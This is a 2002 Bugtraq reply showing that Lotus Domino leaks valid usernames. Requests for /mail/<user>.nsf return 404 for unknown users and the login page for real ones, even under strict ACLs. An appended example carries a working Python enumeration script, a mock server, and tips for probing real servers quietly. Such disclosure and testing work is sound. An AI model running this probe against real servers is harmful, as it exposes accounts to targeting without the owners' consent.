[24075] in bugtraq
Re: Script for find domino's users
daemon@ATHENA.MIT.EDU (nicob@nicob.net)
Sun Feb 3 22:30:31 2002
From: nicob@nicob.net
To: "Simon Delicata" <sdelicata@planer.co.uk>
Cc: bugtraq@securityfocus.com
Date: Fri, 01 Feb 2002 13:41:07 +0100
In-Reply-To: <OFB9B5851F.02EFA365-ON80256B52.006CBA40-80256B52.006E2D45@planer.co.uk>
Message-Id: <4ZDAYW82CAC7A9PKXVE9HONTSX4ZEC.3c5a8ce3@NICOLAS>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
31/01/2002 21:03:10, "Simon Delicata" <sdelicata@planer.co.uk> wrote:
>Two things can be done to avoid this:
>
>1 - Change the ACL on sensitive databases ( /mail/* , names.nsf ) to :
> Anonymous - No access
> [Default] - No access
In my opinion, a Domino web server configured with these ACLs still allows enumeration of
valid users.
If you try to GET a file named /mail/toto.nsf:
- toto doesn't exist => 404
- toto exists => redirection to the login page ("200 OK")
I'm not aware of any ACL configuration which forbids this behaviour.
Nicob
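The enumeration oracle Nicob describes, written out as an added example (it is not code from the thread or from Domino): a probe that requests /mail/<user>.nsf and treats a 404 as "no such mail file" and a 200 or 3xx (the login page, or a redirect to it) as "mail file exists, ACL denied". The host, the candidate usernames and the in-process mock server that reproduces the described behaviour are all constructed for the demonstration; on a real Domino server the "present" case may be a 200 carrying the login form rather than a 302, which is why both are classified the same way.

```python
"""Probe a Domino web server for valid mail files via status-code differences.

Added example, not part of Nicob's post. Assumes the behaviour described in the
thread: GET /mail/<user>.nsf answers 404 for a non-existent user and a 200 (or a
redirect) to the login page for an existing one. Host, wordlist and the mock
server below are constructed for demonstration.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse


def classify(status):
    """Map the status of GET /mail/<user>.nsf to an enumeration verdict."""
    if status == 404:
        return "absent"
    if status == 200 or status in (301, 302, 303, 307):
        # Login page served directly, or a redirect to it: the file exists
        return "present"
    return "unknown"


def probe(host, port, user, timeout=5):
    """Return the raw status code for /mail/<user>.nsf (redirects not followed)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", f"/mail/{user}.nsf")
        return conn.getresponse().status
    finally:
        conn.close()


def enumerate_users(host, port, candidates):
    """Probe every candidate and return {user: verdict}."""
    return {u: classify(probe(host, port, u)) for u in candidates}


# --- constructed mock of the behaviour described in the thread -------------
KNOWN_MAILFILES = {"toto", "sdelicata"}  # hypothetical existing users


class MockDomino(BaseHTTPRequestHandler):
    """Minimal stand-in: 302 to the login form for known mail files, else 404."""

    def do_GET(self):
        path = urlparse(self.path).path
        if path.startswith("/mail/") and path.endswith(".nsf"):
            user = path[len("/mail/"):-len(".nsf")]
            if user in KNOWN_MAILFILES:
                # ACL denies Anonymous, so the server sends the client to log in
                self.send_response(302)
                self.send_header("Location", "/names.nsf?Login")
                self.end_headers()
                return
        self.send_response(404)
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_mock():
    srv = HTTPServer(("127.0.0.1", 0), MockDomino)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo():
    """Run the probe against the mock; returns the verdict per candidate."""
    srv = start_mock()
    try:
        return enumerate_users("127.0.0.1", srv.server_port,
                               ["toto", "nobody", "sdelicata"])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for user, verdict in demo().items():
        print(f"{user}: {verdict}")
```

The probe deliberately does not follow redirects: the distinguishing signal is the first response, and following the 302 would only add a request per candidate. Against a real server, rate-limit the loop and expect the 404-vs-login difference to show up in response size and timing as well as in the status code.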